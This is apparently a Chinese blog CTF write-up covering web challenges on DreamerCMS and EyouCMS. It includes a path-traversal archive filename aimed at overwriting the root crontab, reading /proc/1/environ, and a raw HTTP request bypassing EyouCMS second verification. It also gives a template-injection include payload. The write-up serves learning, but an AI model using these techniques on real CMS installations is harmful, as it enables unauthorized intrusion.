2023年04月20日
1manity
1097
0 评论
随便做做CTF Web题
暂无标签

四道web,出了三道,太菜了QAQ

Web

点击签到

image-20230419161222399

连点10次改完触发1000次

image-20230419161300627

点一下出flag

Dreamer

参考:

https://forum.butian.net/share/2183

image-20230419161502302

使用说明找到默认后台密码

登录后台

image-20230419161346237

image-20230419162309029

任意文件读取。回到首页

image-20230419162350223

访问刚刚开启的栏目

image-20230419162408533

Dreamer_revenge

先进入后台

根据https://forum.butian.net/share/2183 后台模板管理可以任意编辑导致GetShell条目

image-20230419162705149

image-20230419162714044

访问环境变量/proc/1/environ 非预期得到flag (应该是非预期叭)

image-20230419162842933

尝试定时任务反弹shell失败了

压缩包文件名改成

../../../../../../../../../../var/spool/cron/root

成功覆盖,但是定时任务没开,用不了

听说正解是覆盖rt.jar。。。没试过

赛后复现:Eyou

eyou cms 0day

http://eci-2zeacv6uv18sp6ynvjkd.cloudeci1.ichunqiu.com/login.php?s=Admin/login 登录后台 ,密码如题

image-20230419163912649

POST http://eci-2zeacv6uv18sp6ynvjkd.cloudeci1.ichunqiu.com/login.php?m=admin&c=Security&a=second_verify_add&_ajax=1&lang=cn HTTP/1.1
Host: eci-2zeacv6uv18sp6ynvjkd.cloudeci1.ichunqiu.com
Content-Length: 15
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://eci-2zeacv6uv18sp6ynvjkd.cloudeci1.ichunqiu.com
Referer: http://eci-2zeacv6uv18sp6ynvjkd.cloudeci1.ichunqiu.com/login.php?m=admin&c=Filemanager&a=index&lang=cn
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=f7ea191fec68bdd02d8c0291e6626ef2; admin_lang=cn; home_lang=cn; ENV_UPHTML_AFTER=%7B%22seo_uphtml_after_home%22%3A0%2C%22seo_uphtml_after_channel%22%3A%221%22%2C%22seo_uphtml_after_pernext%22%3A%221%22%7D; admin-treeClicked-Arr=%5B%5D; admin-arctreeClicked-Arr=%5B%5D; ENV_GOBACK_URL=%2Flogin.php%3Fm%3Dadmin%26c%3DArticle%26a%3Dindex%26typeid%3D68%26lang%3Dcn; ENV_LIST_URL=%2Flogin.php%3Fm%3Dadmin%26c%3DArticle%26a%3Dindex%26lang%3Dcn; workspaceParam=switch_map%7CIndex
Connection: close

answer=123456&ack=0
HTTP/1.1 200 OK
Connection: close
Content-Length: 125
Cache-Control: private
Content-Type: application/json; charset=utf-8
Date: Wed, 19 Apr 2023 08:51:36 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Set-Cookie: home_lang=cn; path=/
Set-Cookie: ENV_UPHTML_AFTER=%7B%22seo_uphtml_after_home%22%3A0%2C%22seo_uphtml_after_channel%22%3A%221%22%2C%22seo_uphtml_after_pernext%22%3A%221%22%7D; path=/
X-Powered-By: PHP/7.4.21

{"code":1,"msg":"操作成功!","data":"","url":"\/login.php?m=admin&c=Security&a=index&lang=cn","wait":1,"target":"_self"}

二次校验成功

信息收集发现可能有模板注入漏洞\think\Template::parse

img

在使用include标签时会提醒文件不存在,文件名部分可控\think\Template::parseTemplateName

img

此处发现文件名可以填入变量本地调试后payload{eyou:include file="$global.web_logo"/}

image-20230419172945344

image-20230419172959199

模板尾部加入

image-20230419170240853

发表评论

博客信息

1manity的头像
1manity

Weber/21级/0RAYS/V&N/全沾且只沾一点

33

文章数

1

评论数

790天

运行天数

最新文章

目录